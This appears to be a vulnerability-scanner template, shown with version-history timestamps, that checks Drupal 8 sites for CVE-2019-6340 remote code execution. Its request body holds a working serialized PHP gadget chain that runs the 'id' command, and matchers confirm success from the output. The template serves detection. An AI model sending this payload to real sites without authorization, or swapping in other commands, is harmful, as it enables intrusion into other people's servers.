2021-01-02 04:59:06 +00:00
id : CVE-2019-6340
2020-11-21 07:37:33 +00:00
info :
2020-11-21 15:09:12 +00:00
name : Drupal 8 core RESTful Web Services RCE
author : madrobot
2021-09-10 11:26:40 +00:00
severity : high
2020-11-21 15:09:12 +00:00
description : Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases.
2022-04-22 10:38:41 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2019-6340
2022-05-17 09:18:12 +00:00
- https://www.drupal.org/sa-core-2019-003
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210125004201/https://www.securityfocus.com/bid/107106/
2022-05-17 09:18:12 +00:00
- https://www.synology.com/security/advisory/Synology_SA_19_09
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-6340
cwe-id : CWE-502
2022-06-01 21:31:44 +00:00
tags : cve,cve2019,drupal,rce,cisa
2020-11-21 07:37:33 +00:00
requests :
- method : POST
path :
- '{{BaseURL}}/node/1?_format=hal_json'
body : '{
"link": [
{
"value": "link" ,
"options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
}
] ,
"_links": {
"type": {
"href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"
}
}
}'
matchers-condition : and
matchers :
- type : word
words :
- "uid="
2020-11-21 15:09:12 +00:00
- "gid="
2021-10-15 07:01:39 +00:00
- "groups="
2020-11-21 15:09:12 +00:00
condition : and
2020-11-21 07:37:33 +00:00
part : body
- type : status
status :
2021-10-15 07:01:39 +00:00
- 200